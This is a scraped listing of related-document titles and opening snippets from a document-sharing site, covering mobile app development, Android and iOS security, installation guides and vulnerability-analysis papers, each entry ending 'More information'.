mfrontiers white paper November 2013 Enterprise Mobility Management Platform with Simplifying and Empowering the Implementation of Enterprise Mobile Strategy Page 1 of 9 Simplifying and Empowering the
More informationIBM TRIRIGA Anywhere Version 10 Release 4. Installing a development environment
IBM TRIRIGA Anywhere Version 10 Release 4 Installing a development environment Note Before using this information and the product it supports, read the information in Notices on page 9. This edition applies
More informationplace/business fetch details, 184 185 removefromfavorite () function, 189 search button handler bind, 190 191 B BlackBerry build environment
Index A addtofavorite() method, 175 177, 188 189 Android ADT Plugin for Eclipse installation, 22 24 application, GWT Build Path, 244 device info, 247 directory structure, 244, 245 Eclipse classpath, 244
More informationTitle: Appium Automation for Mac OS X. Created By: Prithivirajan M. Abstract. Introduction
Title: Appium Automation for Mac OS X Created By: Prithivirajan M Abstract This document aims at providing the necessary information required for setting up mobile testing environment in Mac OS X for testing
More informationInstallation and configuration guide
Installation and Configuration Guide Installation and configuration guide Adding X-Username support to Forward and Reverse Proxy TMG Servers Published: December 2010 Applies to: Winfrasoft X-Username for
More informationCS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis deyannis@csd.uoc.gr 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
More informationhttp://docs.trendmicro.com
Trend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice. Before installing and using the product, please review the readme files,
More informationANDROID BASED MOBILE APPLICATION DEVELOPMENT and its SECURITY
ANDROID BASED MOBILE APPLICATION DEVELOPMENT and its SECURITY Suhas Holla #1, Mahima M Katti #2 # Department of Information Science & Engg, R V College of Engineering Bangalore, India Abstract In the advancing
More informationQUIRE: : Lightweight Provenance for Smart Phone Operating Systems
QUIRE: : Lightweight Provenance for Smart Phone Operating Systems Dan S. Wallach Rice University Joint work with Mike Dietz, Yuliy Pisetsky, Shashi Shekhar, and Anhei Shu Android's security is awesome
More informationAndroid Environment SDK
Part 2-a Android Environment SDK Victor Matos Cleveland State University Notes are based on: Android Developers http://developer.android.com/index.html 1 2A. Android Environment: Eclipse & ADT The Android
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationKony Mobile Application Management (MAM)
Kony Mobile Application Management (MAM) Kony s Secure Mobile Application Management Feature Brief Contents What is Mobile Application Management? 3 Kony Mobile Application Management Solution Overview
More informationSandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers
Sandy The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security
More informationSAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov
Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real
More informationABSTRACT' INTRODUCTION' COMMON'SECURITY'MISTAKES'' Reverse Engineering ios Applications
Reverse Engineering ios Applications Drew Branch, Independent Security Evaluators, Associate Security Analyst ABSTRACT' Mobile applications are a part of nearly everyone s life, and most use multiple mobile
More informationNative, web or hybrid mobile-app development
IBM Software Thought Leadership White Paper WebSphere Native, web or hybrid mobile-app development 2 Native, web or hybrid mobile-app development Contents 2 Introduction 2 Introducing the approaches 2
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationAndroid Developer Fundamental 1
Android Developer Fundamental 1 I. Why Learn Android? Technology for life. Deep interaction with our daily life. Mobile, Simple & Practical. Biggest user base (see statistics) Open Source, Control & Flexibility
More informationWWW.SANS.ORG. Security Evaluation of Mobile Applications using 'App Report Cards': Android By Raul Siles October 2015
Security Evaluation of Mobile Applications using 'App Report Cards': Android By Raul Siles October 2015 This article introduces the SANS SEC575 mobile 'App Report Cards' project and provides details on
More informationOverview. The Android operating system is like a cake consisting of various layers.
The Android Stack Overview The Android operating system is like a cake consisting of various layers. Each layer has its own characteristics and purpose but the layers are not always cleanly separated and
More informationWEB CONTENT SCANNER SDK
WEB CONTENT SCANNER SDK Web Content Inspection for PCs and Mobile OVERVIEW Web Content Scanner SDK is a multi-platform SDK that enables an application to filter websites based on web content at very high
More information